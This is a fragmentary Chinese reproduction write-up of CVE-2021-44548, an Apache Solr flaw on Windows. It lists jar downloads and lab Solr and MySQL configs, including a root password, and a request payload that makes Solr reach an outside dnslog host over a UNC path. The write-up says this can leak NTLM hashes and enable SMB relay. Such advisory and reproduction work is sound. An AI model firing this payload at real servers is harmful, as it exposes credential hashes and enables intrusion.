-
敏感数据泄露,如系统用户哈希(NTLM/LM哈希); -
在系统配置错误的情况下,SMB中继攻击可能导致用户在SMB共享中被冒充,或导致远程代码执行。
wget https://mirror.shileizcc.com/Solr/mysql-connector-java-5.1.42-bin.jar
wget https://mirror.shileizcc.com/Solr/solr-dataimporthandler-7.3.1.jar
wget https://mirror.shileizcc.com/Solr/solr-dataimporthandler-extras-7.3.1.jar
<requestHandler name="/dataimport" class="org.apache.solr.handler.dataimport.DataImportHandler">
<lst name="defaults">
<str name="config">data-config.xml</str>
</lst>
</requestHandler>
<lib dir="C:/Users/Administrator/Downloads/solr-8.11.0/dist/" regex="mysql-connector-java-5.1.42-bin.jar" />
<lib dir="C:/Users/Administrator/Downloads/solr-8.11.0/contrib/dataimporthandler/lib" regex=".*.jar" />
<lib dir="C:/Users/Administrator/Downloads/solr-8.11.0/contrib/dataimporthandler-extras/lib" regex=".*.jar" />
<lib dir="C:/Users/Administrator/Downloads/solr-8.11.0/dist/" regex="solr-dataimporthandler.*.jar" />
<dataConfig>
<dataSource type="JdbcDataSource"
driver="com.mysql.jdbc.Driver"
convertType="true"
url="jdbc:mysql://192.168.110.179:3306/test"
user="root"
password="Lifeng716.."/>
<document>
<entity name="entity" query="SELECT id, title, content, tags FROM test_table" >
</entity>
</document>
</dataConfig>
expandMacros=false&config=\rxtszi.dnslog.cnaaa
发送请求:
Dnslog收到请求
原文始发于微信公众号(Timeline Sec):CVE-2021-44548:Apache Solr 敏感信息泄露漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论